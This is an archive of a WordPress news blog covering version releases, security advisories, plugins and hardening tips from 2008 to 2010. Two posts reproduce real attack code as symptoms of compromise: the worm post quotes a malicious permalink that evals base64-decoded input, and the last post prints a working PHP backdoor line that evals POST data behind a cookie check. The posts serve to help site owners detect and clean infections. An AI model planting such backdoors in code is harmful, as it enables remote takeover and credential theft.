Check your web host file permissions first!

November 23, 2010 | No Comments Yet

WordPress security issues come and go, and while some stay because it’s tough to get the crud out, other times it’s because site owners overlook an important part of keeping their hosts protected: file permissions.

A properly configured web server will not allow users to access the files of another user, regardless of file permissions. The web server is the responsibility of the hosting provider. The methods for doing this (suexec, et al) have been around for 5+ years.

Matt Mullenweg warns against web hosts and other security announcements that place the blame on the WordPress software without first checking if proper file permissions are in place.

Devlounge has an old but still applicable article on protecting your wp-config.php files, for starters. This article on WP Tavern also tackles the issue above and shares more file permission advice especially on shared hosting accounts.

Leave a Comment | Tags: , , , , , , , , , ,

WordPress .htaccess tips

October 8, 2010 | No Comments Yet

Controlling how URLs behave and who access your site rely on the .htaccess file, and while some of the things it can do have a comfortable interface inside WordPress, there’s so much more to explore. WP Shout goes from A to Z of those possibilities.

For example: if you need to stop spambots, try denying no-referrer requests with this code:

RewriteEngine On
RewriteCond %{REQUEST_METHOD} POST
RewriteCond %{REQUEST_URI} .wp-comments-post\.php*
RewriteCond %{HTTP_REFERER} !.*yourblog.com.* [OR]
RewriteCond %{HTTP_USER_AGENT} ^$
RewriteRule (.*) ^http://%{REMOTE_ADDR}/$ [R=301,L]

Need to study the somewhat cryptic .htaccess language further? Head over to Apache’s official documentation.

Leave a Comment | Tags: , , , , , , , , ,

Tips on keeping your WordPress blog secure

July 22, 2010 | No Comments Yet

Make Tech Easier shares 11 tips on keeping malicious parties from penetrating your WordPress-powered blog. Here’s a snippet:

7) Change your login name

The default username is admin. You can make it more difficult for the hacker to crack your login credential by changing the login name.

You can never be too careful about these things, so be sure to follow the tips mentioned in the article.

(Via)

Leave a Comment | Tags: , , , ,

Mark Jaquith on WordPress and web hosting

May 17, 2010 | No Comments Yet

WordPress lead developer Mark Jaquith sounds off on the state of web hosting companies and their lack of support for the publishing software. He emphasizes two of the biggest issues WordPress users have when it comes to maintaining their installs: caching and security.

People ask me for hosting recommendations all the time. I have a few decent hosts that I’ll recommend, but I don’t have any hosts about which I can say “use them, because they know how to host WordPress, and they’ll support you.” I’d like nothing better than to have a dozen such hosts to recommend by this time next year. WordPress is here to stay, and it’s time for web hosts to adapt!

This is just the first of many voices from WordPress community leaders cementing an initiative for better WP support, as mentioned in the State of the Word at WordCamp SF 2010. I think the greatest lesson here is never to settle with just any web host. With so many choices out there and your own site and brand on the line, choosing a proper, WordPress-friendly host should be top priority. You can’t afford not to.

As for the web hosting companies themselves, it’s a great opportunity to improve their game and offer specialized services that help with the upkeep of their respective client websites. A win-win for all.

Leave a Comment | Tags: , , , , , , , , ,

Matt’s State of the Word at WordCamp SF 2010

May 14, 2010 | No Comments Yet

If you missed the notes Matt’s keynote address at this year’s WordCamp San Francisco, here’s the full video finally posted at WordPress.tv and embedded above.

Look how far WordPress has come in the span of a year. We’re still awaiting the final release of WordPress 3.0 for the much-touted WordPress MU/Multi Site merge, but we’re also getting a bunch of other exciting, game-changing features such as custom post types, a new default WordPress theme every year, canonical plugins, security checks, and more.

Can’t wait to see what will be added to this keynote when WordCamp Philippines 2010 comes around in October.

Leave a Comment | Tags: , , , , , , , , , , , , , ,

Matt Mullenweg WordCamp SF keynote & Mashable interview

May 3, 2010 | No Comments Yet

WP Tavern has posted notes from Matt Mullenweg’s State of the Word at the 2010 WordCamp San Francisco. In it, Matt emphasizes the growth of WordPress into one of the most popular content management systems today: from the admin interface, to the number of plugins, to the upcoming features in WordPress 3.0: WordPress MU merge, menu navigation system, custom post types, and more.

Roughly 74% of WordPress sites are being used as blogs and content management systems. This is up from about 40% last year. It’s the fastest growing use case of the software. About 80% of people are making money from WordPress. 22% WordPress is their day job. 18% from custom development and hosting, 12%.

Other things to take from the talk:

  • A new default WordPress theme will be created every year. This year’s Twenty Ten features custom post headers and backgrounds.
  • WordPress should be as accessible as possible: the Post By Email feature will be turned into a canonical plugin.
  • WordPress.org will be redesigned.
  • Release cycles will go from 3 per year to 2.
  • On security issues: Automattic will work with web hosting companies to help protect its WordPress users, via a mailing list, security checks, and a list of best practices.

Mashable also conducted an interview with him, which covers pretty much the same things discussed at WordCamp. Watch it below:

Leave a Comment | Tags: , , , , , , , , , , , , , ,

Must-have plugins for every WordPress blog

April 2, 2010 | 1 Comment

BloggingPro compiles a list of 10 + 5 WordPress plugins every blog should have. It covers the basics from good ol’ Akismet to security, performance, and analytics plugins.

It doesn’t matter what the aim of your is blog, whether you set out to become the next person getting rich in only 4 hours per week, want to run the hottest dating column in town, aim to take Arrington’s crown or just want to blog for fun, if you chose for WordPress there are some basics your blog needs.

The shortlist:

  • A Solid Theme
  • Akismet
  • Google XML Sitemap
  • Align RSS Images
  • AntiVirus for WordPress
  • Subscribe to comments
  • WP Super Cache
  • WP.com stats
  • WP Twitip-ID
  • FeedBurner FeedSmith
  • The Excerpt Reloaded
  • WP Footnotes
  • Future Dashboard Widget
  • WP Table Reloaded

What’s on your must-have plugins list?

Leave a Comment | Tags: , , , , , , , , , ,

Automattic launches VaultPress backup & protection service

April 1, 2010 | No Comments Yet

VaultPress

VaultPress is a premium offering from Automattic that lets you backup and even more interesting, protect your WordPress-powered site:

In the future, if your site is tampered with in any way, we’ll know within minutes and can take appropriate steps. The VaultPress core engine will be able to protect you against zero-day security vulnerabilities by updating your blog with hot-fixes, even while you sleep.

VaultPress runs as a plugin that runs and responds in real-time. It will also be closely integrated with WordPress.com. On the invitation-only beta signup page, the service costs $20 monthly. It also classifies users into personal, pro-blogger, small business, and enterprise.

Leave a Comment | Tags: , , , , , , ,

More than a dozen useful WordPress database queries

March 1, 2010 | No Comments Yet

Secure, clean up, and optimize your blog with 10 “life-saving” SQL queries from Cats Who Code. Most of them are short and should work by simply copying & pasting them into your database manager. Here’s what you can do:

  1. Manually change your password
  2. Transfer posts from one user to another
  3. Delete post revisions and meta associated to those revisions
  4. Batch delete spam comments
  5. Find unused tags
  6. Find and replace data
  7. Get a list of your commentators emails
  8. Disable all your plugins at once
  9. Delete all tags
  10. List unused post meta
  11. Disable comments on older posts
  12. Replace commentator url
  13. Replace commentator email adress
  14. Delete all comments with a specific url

The article also recommends an SQL WordPress plugin so you don’t have to go anywhere else to execute the queries. If you’re not familiar with SQL, the best way to learn is by example! As a precautionary measure, however, make sure to have a database backup ready before doing any database manipulation.

Leave a Comment | Tags: , , , , , , ,

WordPress 2.9.2

February 16, 2010 | 1 Comment

WordPress 2.9.2 fixes a bug that lets logged in users see trashed posts created by other authors. It’s not a very urgent update, only to whose who find the Trash bug an inconvenience, but it’s still wise to download the latest version whenever you can. This should give you ample time to backup first.

Haven’t used the new Trash feature before? Here’s a walkthrough on it and here’s how to customize it.

Leave a Comment | Tags: , , , , , ,

WordPress upgrade notifications from Google Analytics?

December 1, 2009 | No Comments Yet

If you’ve been blogging for a while now you’ll know that Google Analytics is an indispensable part of your website, so perhaps it’s not surprising that the service has this new feature: software version notifications for your CMS.

One of the great things about working at Google is that we get to take advantage of an enormous amount of computing power to do some really cool things. One idea we tried out was to let webmasters know about their potentially hackable websites. [...] This time, however, our goal is not just to isolate vulnerable or hackable software packages, but to also notify webmasters about newer versions of the software packages or plugins they’re running on their website. [..] This is where we think we can help. We hope to let webmasters know about new versions of their software by sending them a message via Webmaster Tools. This way they can make an informed decision about whether or not they would like to upgrade.

I’m not sure this is any better than installing a plugin such as Update Notifier that sends emails whenever your WP installation or WP plugins need updating. After all, it still depends on the generated version meta tag which both WordPress and hackers use to check.

The upside here, though, is that at least Google is now looking into ways they can help with website maintenance, particularly security. And not just for WordPress, but for all other content management systems out there. Both CMS developers and webmasters stand to gain from the knowledge and resources Google can spend on this.

In the meantime, keep your eyes peeled as this new feature will be rolling out “soon”.

(Via WPLover)

Leave a Comment | Tags: , , , , , ,

WordCamp Philippines 2009 talk: WordPress in the Wild

November 26, 2009 | No Comments Yet

Markku Seguerra just blogged about his talk in this year’s WordCamp Philippines called “WordPress in the Wild”:

WordPress used to simply be a blogging app and not much more. It’s growth in the past few years though has pushed it to adapt a more extensible structure to allow for other uses beyond blogging as well as various other customizations. These changes made it more appealing to a wider range of users, but at the same time it also introduced some performance bottlenecks that become apparent when your blog rises to be just a bit too popular. Ah, the price of success.

His slides on WordPress deployment, performance, optimization, and security are embedded in the post, but scroll down for all the important links and points covered by his presentation. A bit on the technical side, but definitely a must-read for everyone running a WordPress website.

Leave a Comment | Tags: , , , , , , , , , , , ,

WordPress 2.8.6

November 13, 2009 | No Comments Yet

WordPress 2.8.6 is another important security release that tackles vulnerabilities in the Press This bookmarklet and upload file names.

The first problem is an XSS vulnerability in Press This discovered by Benjamin Flesch. The second problem, discovered by Dawid Golunski, is an issue with sanitizing uploaded file names that can be exploited in certain Apache configurations. Thanks to Benjamin and Dawid for finding and reporting these.

Upgrade now!

Leave a Comment | Tags: , , , , , , ,

WordPress Plugins Directory adds user-voted compatibility checker

October 28, 2009 | No Comments Yet

WordPress.org Plugin Directory compatibility feature

WordPress plugins listed at WordPress.org’s official plugin directory now have a new feature for compatibility checking. It uses the naturally-helpful WordPress community to gather statistics on how compatible a plugin is for a certain WordPress version. Weblog Tools Collection reports:

Normally, the plugin information within the FYI box tells you which version of WordPress is required and which version the plugin is compatible up to. Unfortunately, the version the plugin is compatible up to is not updated that often which is why some plugins which state that they only work up to WordPress 2.5 end up working with the latest release.

[...] The beauty of this system is that it leverages the community in order to figure out what works with what. However, just because it works for the majority of users is no guarantee it will work on your particular setup. But using these statistics, it should make it easier to figure out whether the issue is with the plugin and WordPress or with your setup.

One of the biggest fears users have when it comes time to upgrade WordPress is whether their plugins will work on the newest version or not. There are a large handful of people who upgrade to the latest version of WordPress as soon as it’s released and the hope is, these folks will visit the plugin page and report their findings for others to take advantage of. If more users see that their plugins work on the newest version, they are more likely to upgrade.

It’s not yet on all plugins, and it doesn’t appear yet inside details screen when you install from within your WP admin, but expect that to change soon. After all, this feature is still in beta.

But the biggest advantage, as WLTC notes in the last paragraph above, is key here. WordPress-powered sites often stay outdated and unable to fight off security attacks because their owners fear for incompatible plugins breaking their site. This checker should help quell those fears. And of course, this is a great incentive to make sure you’re grabbing plugins from the most legitimate source out there.

Leave a Comment | Tags: , , , , ,

WordPress 2.8.5

October 21, 2009 | No Comments Yet

WordPress has come out with yet another security upgrade (they call it a “hardening release”), notably in line with this trackback-related 0-day exploit.

As you know over the past couple of months we have been working on the new features for WordPress 2.9. We have also been working on trying to make WordPress as secure as possible and during this process we have identified a number of security hardening changes that we thought were worth back-porting to the 2.8 branch so as to get these improvements out there and make all your sites as secure as possible.

The WordPress team also recommends users to install the WordPress Exploit Scanner plugin, which you can download here.

Leave a Comment | Tags: , , , , , ,

Long term support for old WordPress branches? Not likely

September 22, 2009 | No Comments Yet

From WPTavern’s report on the latest WordPress Dev Chat, one of the questions raised was the possibility of bringing back long-term support (LTS) for older versions of WordPress in light of the security issues that have been plaguing the software. The short answer? No way.

jeffr0 – Directed at Mark. Has their been any talk of a new supported legacy branch?

Considering the security stuff earlier this month, some folks have been suggesting that WordPress bring back a supported legacy branch of WordPress. I decided to ask if any talk of this has been ongoing in the inner dev circle and Mark replied that he wasn’t aware of any. In fact, Mark stated he would be extremely opposed to an LTS (Long Term Service) branch. Sivel doesn’t think it is something that they are ready to undertake.

MarkJaquith – I’d rather direct resources to making upgrades smoother and showcasing well-coded plugins that won’t break on upgrade.

westi – The only way a LTS branch is going to exist is if the person that wants it creates it. our resources are better directed elsewhere

Clearly the WordPress development team is focused on moving forward rather than stepping back. If you ask me, as long as they’re putting security and the push to keep people’s WordPress versions up-to-date as top priorities, it’s all good. People usually put plugin compatibility before blog security, and that’s really not a responsible thing to do. Having little to no support for outdated versions of WordPress is one of the ways to change this bad habit.

(Via BloggingPro)

Leave a Comment | Tags: , , , ,

WordPress Plugin: Upgrade Notification by Email

September 8, 2009 | No Comments Yet

Upgrade Notification by Email does exactly what it is called: anytime WordPress sends out a new update, your blog administrator’s email inbox will receive a notice that you should upgrade. Now you have no excuse to install the latest, most secure version of WordPress on your website as soon as possible.

This plugin is for you if you don’t look inside of your Admin Panel every day (for example you have tens of wordpress installations) but still want to have wordpress up to date. After installation plugin will check every day if newer version of wordpress is available and if yes, will send email to blog’s admin with notification.

Download Upgrade Notification by Email

Leave a Comment | Tags: , , , , , ,

Update and secure your WordPress installation

September 7, 2009 | No Comments Yet

There’s a worm circling the WordPress community and it’s attacking all sites that have not been updated to version 2.8.4. Lorelle reported its symptoms:

  1. “There are strange additions to the pretty permalinks, such as example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/. The keywords are “eval” and “base64_decode.””
  2. “The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution.”

This certainly sounds familiar. Matt explains further:

Right now there is a worm making its way around old, unpatched versions of WordPress. This particular worm, like many before it, is clever: it registers a user, uses a security bug (fixed earlier in the year) to allow evaluated code to be executed through the permalink structure, makes itself an admin, then uses JavaScript to hide itself when you look at users page, attempts to clean up after itself, then goes quiet so you never notice while it inserts hidden spam and malware into your old posts.

The tactics are new, but the strategy is not. Where this particular worm messes up is in the “clean up” phase: it doesn’t hide itself well and the blogger notices that all his links are broken, which causes him to dig deeper and notice the extent of the damage. Where worms of old would do childish things like defacing your site, the new ones are silent and invisible, so you only notice them when they screw up (as this one did) or your site gets removed from Google for having spam and malware on it.

It must be stressed that upgrading is a preventive measure; if you’ve been attacked, you’ll need to go through your files and databases to get rid of the offending code.

A stitch in time saves nine. Upgrading is a known quantity of work, and one that the WordPress community has tried its darndest to make as easy as possible with one-click upgrades. Fixing a hacked blog, on the other hand, is quite hard. Upgrading is taking your vitamins; fixing a hack is open heart surgery. (This is true of cost, as well.)

Leave a Comment | Tags: , , , , ,

Google’s Matt Cutts praises WordPress for SEO

August 31, 2009 | 1 Comment

Take it from Matt Cutts, head of the Web Spam team at Google: WordPress is a “fantastic” choice for search engine optimization. That’s what he said at his talk at WordCamp San Francisco last May. Here’s the presentation video:

And here are the slides:

According to Matt, “WordPress takes care of 80-90% of (the mechanics of) SEO”. He goes on to explain PageRank calculation, and what you can do within WordPress to improve search engine ranking, from tweaking post permalinks (hyphens are best, followed by underscores; but no spaces are the worst) to securing your WP install (add .htaccess to your wp-admin folder and update often!).

(Via HowToMakeMyBlog)

Leave a Comment | Tags: , , , , , , , , , , , , , ,

WordPress 2.8.4

August 12, 2009 | No Comments Yet

As expected, Automattic promptly released WordPress 2.8.4, a security update to the previously mentioned remote admin password reset vulnerability.

Yesterday a vulnerability was discovered: a specially crafted URL could be requested that would allow an attacker to bypass a security check to verify a user requested a password reset. As a result, the first account without a key in the database (usually the admin account) would have its password reset and a new password would be emailed to the account owner. This doesn’t allow remote access, but it is very annoying.

Whether you’ve patched your WP installation as instructed or not, better grab this upgrade immediately. As always, backup before doing so!

Leave a Comment | Tags: , , , , , , , , ,

Remote admin password reset vulnerability issue in WP 2.8.3 and below

August 12, 2009 | 2 Comments

WordPress 2.8.3. just came out but even this doesn’t seem enough to stop this newly discovered security issue, which resets your administrator password remotely. This was reported by Laurent Gaffié in the Neohapsis mailing list a couple of days ago.

The software vulnerability has been submitted to the WordPress trac, and according to them there’s a one-liner fix: in wp-login.php, change line 190 from

if ( empty( $key ) )

to

if ( empty( $key ) || is_array( $key ) )

Sucuri Security, however, still argues that “they are still using blacklists instead of a whilelist of what should be accepted”.

Expect another security update to your WordPress install very soon. In the meantime, prepare to backup your database and files again!

Leave a Comment | Tags: , , , , ,

WordPress Plugin: Absolute Privacy

August 6, 2009 | No Comments Yet

Blogs are usually public publishing platforms, but what if you wanted to keep yours away from prying eyes? Enter Absolute Privacy, a WordPress plugin designed to lockdown your WP blog with all custom user access features. You have to option to hide your blog from viewers who are not logged in and force new registrants to enter their first and last name.

After having a few odd registrations and comments on our family blog, my wife asked me to create a plugin that would give the blog security from strangers but still be easily accessible to family and friends. Absolute Privacy does just that! Absolute Privacy turns your WordPress blog into a fully private site where you control who has access. It’s perfect for family blogs, private communities, and personal websites.

Download Absolute Privacy

Leave a Comment | Tags: , , , ,

WordPress 2.8.3

August 4, 2009 | No Comments Yet

WordPress 2.8.3 just dropped last night. It fixes several security issues that were overlooked with the WP 2.8.1 release, pointed out by several members of the WordPress community. Don’t you love it when everybody helps out?

Download the latest version now or upgrade automatically from your admin panel.

Leave a Comment | Tags: , , , , , ,

WordPress 2.0.x now deprecated

July 30, 2009 | No Comments Yet

The WordPress development team is now ending support for the WordPress 2.0.x branch, just a few months earlier than the planned 2010 deprecation.

Many of the security improvements to the new versions of WordPress in the last couple of years were complete reworks of how various systems were handled. Porting those changes to the 2.0.x branch would have been a monumental task and could have introduced instability or new bugs. We had to make hard decisions between stability and merging in the latest security enhancements. Additionally, far fewer people stayed on the 2.0.x branch than we anticipated. I take that as a testament to the new features in WordPress and perhaps even more the features offered by plugins, many of which don’t support older versions of WordPress!

The good news is, there are way fewer people who have left their WordPress installations outdated than updated. If you’re part of that group, though, do the right thing and upgrade now! The advantages—both in features and security—far outweigh the disadvantages.

Leave a Comment | Tags: , , , , , , ,

WordPress 2.8.2

July 20, 2009 | No Comments Yet

WordPress 2.8.2 is an important security update that addresses an XSS vulnerability with unsanitized comment author URLs. No betas or release candidates came out before this version, but upgrade away! The notice should already be up in your WordPress admin panel.

Leave a Comment | Tags: , , , , , , , ,

WordPress 2.8.1 & WordPress MU 2.8.1

July 11, 2009 | No Comments Yet

The first official release since the big WordPress 2.8 is finally out. Highlights of the new features are listed in the announcement post, but you can also view the complete list here. Lots of fixed glitches, memory improvements, and improved security:

Core Security Technologies notified us that admin pages added by certain plugins could be viewed by unprivileged users, resulting in information being leaked. Not all plugins are vulnerable to this problem, but we advise upgrading to 2.8.1 to be safe.

WordPress MU also came out with version 2.8.1 a day after. Unlike WordPress, WPMU didn’t have a version 2.8, so this is a big update for all you multi-users out there (including BuddyPress). Download it now!

You can upgrade to WP 2.8.1 by downloading it at WordPress.org or by clicking “upgrade automatically” after following the notice in your administration panel.

Leave a Comment | Tags: , , , , , , , , , ,

WordPress Plugin: Injection Attack Protector

July 1, 2009 | No Comments Yet

There are a lot of types of security breaches that threaten your WordPress blog, and spam/malware injection seems to be the most popular of the lot. Fortunately there’s a plugin that helps prevent that called the Injection Attack Protector. This script allows to you to scan your site for possible injection attacks and even a heal tool for the compromised files.

Make sure to follow the given instructions for the plugin to work properly. You’ll need to know how to create a password-protected folder on your site and edit certain files thru a text editor.

Download Injection Attack Protector

Leave a Comment | Tags: , , , , ,

WordPress 2.8.1 Beta 1

June 22, 2009 | No Comments Yet

Almost two weeks after the big release comes the first beta of WordPress 2.8.1. The bug fixes are listed here, which includes memory fixes and added security.

Instructions for upgrading from WordPress 2.8 to WordPress 2.8.1 beta 1 can be found here. If you still haven’t upgraded to WordPress 2.8 and are more of a cautious user, you might want to wait until WP 2.8.1 comes out.

Leave a Comment | Tags: , , , , , , ,

Protect your WordPress blog with these plugins

June 17, 2009 | No Comments Yet

With WordPress 2.8 out, that means it’s upgrade season for us. That also means older, unupdated versions of WP more vulnerable to attacks. Keith Dsouza of Weblog Tools Collection has a list of recommended anti-spam and antivirus plugins to help improve security on your blog:

Anti-spam WordPress Plugins

  1. Akismet
  2. WP-SpamFree Anti-Spam
  3. WP-Hashcash
  4. WP reCAPTCHA
  5. Math Comment Spam Protection

Security WordPress Plugins

  1. WP Security Scan
  2. WordPress Exploit Scanner
  3. AskApache Password Protect
  4. TTC WordPress Security Tool
  5. Secure WordPress
  6. WordPress Firewall

Check out the blog post for details and download links to each of the plugins listed above. Got any more plugins you can recommend? You can never have enough!

Leave a Comment | Tags: , , , , ,

Errors and blank screens on your WordPress blog? You could have been hacked

April 8, 2009 | No Comments Yet

An important security issue for sites running WordPress: if you get this error “Parse error: syntax error, unexpected T_VARIABLE” or blank screens on your blog, there’s a very good change that you may have been hacked.

Design and Promote has a detailed list of bringing back your site into pristine condition, but if you can’t do that on your own, you can pay them $100.00 for the service. Either way, the first and most important step is finding out if your site has been compromised.

Leave a Comment | Tags: , , , ,

The death of WordPress?

February 21, 2009 | No Comments Yet

How about bringing up the unspeakable for a change: Jeff Chandler at WordPress Tavern looks into the possibilities of WP’s demise. Here’s the shortlist:

  1. Third Party Support Disappears
  2. Change In License
  3. Just A Pile Of Bloat
  4. Someone Else Does It Better
  5. Security Blunders
  6. Leadership Heads South

A lot of the points in the article have been raised in different avenues before, but it will take a combination of several factors for WordPress to really decline. It’s the way the world works; change is constant, and we always move towards something that performs better.

However, I wouldn’t mind the day it becomes much less popular than it is, as long as the dedication of the developers and the community remains. And this is really one of the best features of WordPress today.

(Via WP FUN)

Leave a Comment | Tags: , , , , ,

10 ways to secure your WordPress administration panel

January 27, 2009 | No Comments Yet

Sergej Müller and Alex Frison on Smashing Magazine have written a 10-step guide to protecting and ensuring your WordPress admin area is as safe as can be. Here’s the list:

  1. Rename and upload the wordpress Folder
  2. Extend the file wp-config.php
  3. Move the wp-config.php file
  4. Protect the wp-config.php file
  5. Delete the admin User Account
  6. Choose strong passwords
  7. Protect the wp-admin Directory
  8. Suppress Error Feedback on the Log-In Page
  9. Restrict Erroneous Log-In Attempts
  10. Keep Software Up to Date

Read the whole thing here.

It’s best if you perform these safety measures right after installing WordPress, and add it to your routine in case you’ve got a slew of WP-powered sites.

Leave a Comment | Tags: , , , , , , ,

How to secure your WordPress installation

November 13, 2008 | 1 Comment

MyTestBox.com shares several important tips to keep your WordPress install secure. Here’s a summary:

  • Your “plugins” directory is NOT secured by default!
  • Choose a strong password!
  • Rename the administrative account!
  • Backup your database!
  • Log all your $POST variables!
  • Plugins that need write access!
  • Encrypt all communication within “wp-admin” directory! (if possible)
  • Tighten up the file permissions!
  • Of course, update your WordPress!

The last one is the simplest and easiest to follow, especially with the release of WP 2.7. You should at least make sure that you upgrade to the latest version of WordPress.

The blog post also contains links to other articles on hardening WordPress and dealing with hackers, so read it now!

Leave a Comment | Tags: , , ,

Download WordPress only from WordPress.org, or else

November 7, 2008 | 1 Comment

Weblog Tools Collection reports that people are now taking advantage of the popularity of WordPress to attack unsuspecting users with outdated versions with a fake WordPress version.

If there is one topic that needs to be reblogged, it’s WordPress security. The most important thing you need to remember from this is to only download WordPress from WordPress.org. The URL is http://wordpress.org/ so check to see if that’s what’s in your browser address bar.

There is no WordPress 2.6.4 (we’re at WordPress 2.7 beta 2 already, for crying out loud!). The fake website WordPresz.org will give you a trojanized, phishing, scammed version of WordPress.

And while we’re on the subject of downloads, make sure the themes and plugins you download can be trusted by getting them from WordPress.org’s Extend section.

We know piracy is rampant in the Philippines, but we’re talking about free, open source web software here. There’s no reason not to get WordPress straight from the source.

Recommended reading:

Leave a Comment | Tags: , , , , , ,

WordPress.com blogs DOS attacked

October 29, 2008 | No Comments Yet

The Blog Herald reports that a denial of service attack hit several WordPress.com blogs on October 27, and even VIP users like the GigaOM Network were not spared.

There’s no official word on any of the WordPress/Automattic blogs, only a tweet from @wordpressdotcom and a post entitled “Anatomy of a Denial of Service Attack”.

Leave a Comment | Tags: , , , ,

WordPress 2.6.3

October 24, 2008 | No Comments Yet

WordPress 2.6.3 provides a security fix for a vulnerability found in the Snoopy library, which according to the project page is a “PHP class that simulates a web browser”.

Since this is a security upgrade, it’s best that you download the latest version immediately. But since only 2 files were updated, i.e. wp-includes/class-snoopy.php and wp-includes/version.php, you can also just grab those and replace the ones on your server.

Leave a Comment | Tags: , , , , , , , ,

Is WordPress getting too “fat” and vulnerable?

September 18, 2008 | No Comments Yet

Vladimir Prelovac has written a very insightful critique about the direction of WordPress development. He states several concerns with what this piece of blogging software is turning into. First we have bloat:

But more importantly, I have noticed that WordPress is not developing “far” anymore, and it started going “wide” instead. By this I mean there are less inventions and new technologies with every update. There is just more functionality that relies on current existing technologies.

[...]

WordPress started out like Google, but is now becoming more and more like Yahoo. It stopped going “far” and started becoming fat (”wide”). It is becoming slow and clumsy.

Second, we have security issues, most notably with WordPress plugins. Jeff Chandler at Performancing suggests the WordPress community could adopt phpBB’s plugin validation system.

All in all, Vladimir wants WordPress to focus on speed, simplicity, and security in future WordPress versions.

You’ll find Matt Mullenweg’s answers in the comments section. He mentions WP 2.3 is a lot more bloated and insecure than WP 2.6—better beware of this fact for those who haven’t upgraded! He also says he’s aware of speed issues, hence the integration with Google Gears, and the constant drive towards improving the backend:

I’m obsessed with speed. On the backend WP has done a ton to speed itself up, as evidenced by the fact that it now runs the largest blogs in the world. More than 1.6 billion pageviews a month are going through WordPress.

As for plugins, this is what Matt had to say:

There are some automated things we do to watch out for bad stuff but ultimately I think we need a human team of volunteers to keep an eye on plugin changesets. Is this something you’d be interested in helping out with?

What do you think? I think that as long as there is a strong community backing up WordPress, such issues will never go unnoticed. I can only hope that this same community continues to help out with new initiatives, such as plugin and theme inspection.

Leave a Comment | Tags: , , , , , , ,

WordPress 2.6.2

September 9, 2008 | No Comments Yet

WordPress 2.6.2 is a security release which tackles problems with SQL Column Truncation and mt_rand().

Since WordPress 2.6.1 was an optional update—first time in the history of WordPress—is WP 2.6.2 the same way? Here’s the answer:

If you allow open registration on your blog, you should definitely upgrade. With open registration enabled, it is possible in WordPress versions 2.6.1 and earlier to craft a username such that it will allow resetting another user’s password to a randomly generated password.

The dev blog also notes that this vulnerability is also applicable to other PHP-based applications.

Aside from security fixes, WP 2.6.2 contains a number of bug fixes as well.

Download WordPress 2.6.2 now.

Leave a Comment | Tags: , , , , , , ,

WordPress Plugin: WordPress Exploit Scanner

June 27, 2008 | No Comments Yet

With all the talk about WordPress security vulnerabilities, every bit of protection helps. The WordPress Exploit Scanner plugin does just what it says: it looks for any suspicious behavior in your WordPress files and database tables.

This WordPress plugin searches the files on your site for a few known strings sometimes used by hackers, and lists them with code fragments taken from the files. It also makes a few checks of the database, looking at the active_plugins blog option, the comments table, and the posts table.

It also allows the blog owner to search for whatever string they like which could come in handy when new exploit code is used in a hack.

Download WordPress Exploit Scanner

Leave a Comment | Tags: , , , , , , ,

More WordPress blogs being hacked

June 18, 2008 | No Comments Yet

Last time, it was a WordPress vulnerability that was resolved by upgrading to the latest version. This time, it’s a non-WordPress issue, specifically a redirect technique, that’s affecting a lot of WordPress-powered blogs.

The recent security issues concern hackers who work with Google and other search engine results and redirects traffic from your blog or website. The searchers clicks on the link and is redirected to the hacker’s site with the same search string used to search in the search engine. Most bloggers notice a problem when their site traffic drops inexplicably and/or their ad income drops.

Read Lorelle’s post for more information on detecting and eliminating this security issue.

Leave a Comment | Tags: , , , , , ,

WordPress 2.5.1 Released, But You Can’t Reset Passwords and 2.5.2 is Close Behind; Will You Update?

April 28, 2008 | 1 Comment

Just as Filipino bloggers trooped to U.P. Diliman for the 4th iBlog Summit, WordPress 2.5.1 was released. It has over 70 security fixes and enhancements, including a SECRET_KEY in the wp-config.php file explained in-depth by Ryan Boren.

Now it seems people are debating whether one should hold off for the next WordPress version for several reasons. First, there’s a bug that can potentially lock people out of their blogs should they wish to reset their passwords. This can be fixed by manually editing the password through phpMyAdmin, and there’s a patch for the WordPress update itself.

Second, there’s talk that WordPress 2.5.2 will soon be out. This could frustrate a lot of bloggers who aren’t really comfortable with updating WordPress.

So will you upgrade to 2.5.1 immediately, or wait until 2.5.2 comes out? I’d say it has a lot to do with how confident you are in the blog security of your current installation.

Leave a Comment | Tags: , , ,

Has Your WordPress Been Hacked Recently?

April 16, 2008 | 34 Comments

Matt Mullenweg’s recent post about a “bogus” WordPress security breach had me wondering about my own WordPress sites. Unfortunately, it turns out I’ve become a victim of a WordPress vulnerability whose symptoms are detailed here. Took me two whole nights of restoring my files and folders to their pristine condition. (Fingers crossed.) Take note that this is different from the ro8kfbsmag.txt hack, and seems to be a fairly recent attack. Thankfully, there are a lot of tell-tale signs:

Extra code added to the first line of PHP files

<?php if(md5($_COOKIE['_wp_debugger'])=="dfa1bcf40aa72fdb46ed40f7651fe76e"){ eval(base64_decode($_POST['file'])); exit; } ?>

Note that the letters numbers and numbers vary.

Solution: open the infected file and delete that code. I recommend using an FTP client like FileZilla, which when coupled with a text editor lets you edit a file then reflect thse changes on the server very quickly.

New files ending in _new, _old, .pngg, .jpgg, .giff appearing inside writable directories

See if there are any files in writable directories that have the same named as an existing file with the extensions _new.php, _old.php, .php.pngg, .php.jpgg, or .php.giff. These files will be executables that when called from a browser will display a fake “404 Not Found” error, but if called from a script with the matching hash from one of the hacked PHP scripts, will display system info about the server your site is sitting on.

Solution: delete the files.

New files named wp-info.txt which contain database usernames and passwords

This file will contain userinfo dumped from the MySQL database… usernames, emails, passwords, everything. Move it ASAP, but check your logs to see if it was accessed already.

Solution: delete the file and change all your passwords! Aside from your own, your visitors’ emails and passwords are also there, and somebody else is exploiting that information already.

New “WordPress” user in database (hidden in the admin panel users page)

One other thing I noticed, and this happened on the new 2.5 installs as well as the older ones that hadn’t been upgraded yet, was the silent addition of the user “WordPress”, with no info save a password, and an add date of all zeroes. There’s also no indication of user level in the database, and the user doesn’t show up in the User menu. However, when I was going through and deleting unnecessary “admin” logins, “WordPress” came up as one of the user options to reassign posts to… otherwise it might have been a while before I’d found that buried in the database.

Solution: delete the user. You need to access your database through phpMyAdmin or something similar.

WordPress version changed to 2.5

I’m logged into a site I know is still running 2.1.3, but the footer in the admin panels say 2.5 now.

Solution: upgrade to WordPress 2.5. Keeping your installation up-to-date eliminates old vulnerabilities.

More signs

The file creation and modification seemed to take place on April 11. For me it was the 12th. That’s surprisingly recent.

Also, you might get a lot of suspicious error messages in your logs, dating as far back as last year.

More Solutions

